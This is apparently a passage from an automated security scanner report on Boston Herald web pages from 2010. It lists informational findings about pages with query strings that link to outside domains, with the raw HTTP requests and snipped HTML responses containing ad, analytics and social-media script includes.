http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/regional/
http://gallery.pictopia.com/bostonherald/gallery/news/Thief%20makes%20escape%20in%20wedding%20limo
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101106/6fb9d3_limo_11072010.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/d23c70_110610weddingmg02.JPG
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /news/regional/view.bg?articleid=1294586&position=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:12:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview%2F20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level%2Fsrvc%3Dhome%26position%3D2&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Real-life wedding crasher');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294586&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(35) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
oto gallery: Thief makes escape in wedding limo" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4516','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101106/6fb9d3_limo_11072010.jpg" alt="GET THEM TO THE CHURCH ON TIME: A..." /></A>
...[SNIP]...
<A HREF="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4516','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/d23c70_110610weddingmg02.JPG" alt="Boston Herald"></a>
...[SNIP]...
<div id="buyPhotosBar">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/news\\Thief makes escape in wedding limo"><img src="/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/news\\Thief makes escape in wedding limo">Purchase Herald Photos</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id="adCompanionSubstitute">
<IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle1 ID=i_middle1 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle1&companion=&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle"></IFRAME>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview%2F20101107real-life_wedding_crasher_limo_bandit_takes_something_borrowed_to_new_level%2Fsrvc%3Dhome%26position%3D2&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.36. http://bostonherald.com/news/us_politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/us_politics/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/us_politics/?srvc=news&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fus_politics%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/margery_eagan.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/us_politics/
http://multimedia.heraldinteractive.com/images/20101106/stp/00df7b_obam.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/3bcd07_Obama_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/e89f17_DeMint_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/25bec3_pence.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/64a019_obam.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/b8cce6_gates.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/d68841_rand.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/d9d7f5_mitch.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/us_politics/?srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:37:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



   <link rel="alternate" title="U.S. Politics - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/us_politics/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fus_politics%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries </a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/64a019_obam.jpg" alt="U.S. President Barack Obama speaks during a town-hall style meeting with students at St. Xavier’s College in Mumbai, India, Sunday."></a>
...[SNIP]...
<a href="/news/us_politics/view/20101106despite_the_shellacking_president_obama_keeping_his_team_intact/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/3bcd07_Obama_11072010.jpg" alt="President Obama makes a statement to reporters after meeting with his staff and Cabinet in the White House Thursday. From left are, HHS Secretary Kathleen Sebelius, Interior Secretary Ken Salazar, the president and Chief of Staff Pete Rouse."></a>
...[SNIP]...
<a href="/news/us_politics/view/20101106obama_well_never_forget_mumbai_attacks/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/00df7b_obam.jpg" alt="U.S. President Barack Obama and first lady Michelle Obama make a statement after their visit the memorial for the Nov. 26, 2008 terror attack victims at the Taj Mahal Palace and Tower Hotel in Mumbai, India, Saturday."></a>
...[SNIP]...
<a href="/news/us_politics/view/20101107mitch_mcconnell__says_banning_earmarks_is_complicated/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/d9d7f5_mitch.jpg" alt="Senate Minority Leader Sen. Mitch McConnell of Ky., delivers his remarks on the elections and policy agenda for moving forward, Thursday, at the Heritage Foundation in Washington."></a>
...[SNIP]...
<a href="/news/us_politics/view/20101106jim_demint_basks_in_election_afterglow_but_did_he_cost_gop_the_senate/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/e89f17_DeMint_11072010.jpg" alt="Sen. Jim DeMint used the midterm elections to vault from first-term South Carolina senator to rainmaker of the nation’s tea party. "></a>
...[SNIP]...
<a href="/news/us_politics/view/20101107gops_mike_pence_to_decide_on_2012_bid_after_new_year/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/25bec3_pence.jpg" alt="Republican Rep. Mike Pence speaks after defeating Democrat Barry Welsh in the race for Indiana’s 6th Congressional district in Indianapolis, Tuesday."></a>
...[SNIP]...
<a href="/news/us_politics/view/20101107robert_gates_urges_congress_to_repeal_gay_military_ban_now/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/b8cce6_gates.jpg" alt="Defense Secretary Robert Gates "></a>
...[SNIP]...
<a href="/news/us_politics/view/20101107sen-elect_rand_paul_gop_must_consider_military_cuts/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/d68841_rand.jpg" alt="In this Nov. 3, 2010, file photo Sen.-elect Rand Paul, R-Ky., awaits the start of an interview in Bowling Green, Ky."></a>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1294589"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG" alt="Local Politics" /></a>
...[SNIP]...
</div>

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif" alt="Howie Carr" />
                <div class="byline">
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/margery_eagan.gif" alt="Margery Eagan" />
                <div class="byline">
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.37. http://bostonherald.com/photobox/index.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/photobox/index.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/photobox/index.bg?type=news&page=10

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fphotobox%2Findex.bg%3Ftype%3Dnews%26page%3D10&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /photobox/index.bg?type=news&page=10 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 404 Not Found
Date: Mon, 08 Nov 2010 03:16:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title=" - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fphotobox%2Findex.bg%3Ftype%3Dnews%26page%3D10&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.38. http://bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/projects/your_tax_dollars.bg?src=Mwra

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fprojects%2Fyour_tax_dollars.bg%3Fsrc%3DMwra&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
